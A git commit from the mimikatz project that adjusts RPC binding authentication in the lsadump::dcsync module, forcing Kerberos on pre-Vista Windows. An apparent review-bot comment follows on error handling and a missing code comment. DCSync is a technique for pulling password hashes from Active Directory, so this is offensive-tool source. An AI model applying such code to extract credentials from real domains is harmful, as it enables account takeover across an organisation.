lsadump::dcsync - XP and 2003 don't allow QueryContextAttributes for SECPKG_ATTR_SESSION_KEY when using the NTLM protocol in userland, forcing Kerberos instead (Negotiate otherwise).

Thanks @asolino for letting me show!
This commit is contained in:
Benjamin DELPY 2015-08-24 12:21:52 +02:00
parent b2687e3085
commit ae041e0ece
1 changed files with 3 additions and 7 deletions


@ -64,19 +64,15 @@ BOOL kull_m_rpc_drsr_createBinding(LPCWSTR server, RPC_BINDING_HANDLE *hBinding)
{
RtlCopyMemory(fullServer, PREFIX_LDAP, szPrefix);
RtlCopyMemory((PBYTE) fullServer + (szPrefix - sizeof(wchar_t)), server, szServer);
rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) fullServer, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE, NULL, 0, &SecurityQOS); // in case of problem with session key on old OS: RPC_C_AUTHN_GSS_KERBEROS
status = (rpcStatus == RPC_S_OK);
if(!status)
PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus);
if(status)
rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) fullServer, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_VISTA) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, 0, &SecurityQOS);
if(rpcStatus == RPC_S_OK)
{
rpcStatus = RpcBindingSetOption(*hBinding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR) kull_m_rpc_drsr_RpcSecurityCallback);
status = (rpcStatus == RPC_S_OK);
if(!status)
PRINT_ERROR(L"RpcBindingSetOption: 0x%08x (%u)\n", rpcStatus, rpcStatus);
}
else PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus);
LocalFree(fullServer);
}
}
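Review bot: The new `else PRINT_ERROR(L"RpcBindingSetAuthInfoEx: ...")` branch at the end of the hunk reports the failure but never assigns `status`, whereas the line `status = (rpcStatus == RPC_S_OK);` that immediately followed the old RpcBindingSetAuthInfoEx call appears to be among the removed lines (the rendered hunk has lost its +/- markers, so this is inferred from the 3/7 counts). Unless `status` is still FALSE from its initialisation — the function's start and its `return status` are outside the hunk — a binding whose PKT_PRIVACY authentication could not be set would be handed back as successful; making the failure explicit, `else { status = FALSE; PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus); }`, removes the dependence on that earlier value. The ternary on the RpcBindingSetAuthInfoEx line also drops the old inline comment about old-OS session keys without replacing it; the reason is only in the commit message, so add `// pre-Vista: NTLM (via Negotiate) cannot return SECPKG_ATTR_SESSION_KEY from userland, so force Kerberos` above that call.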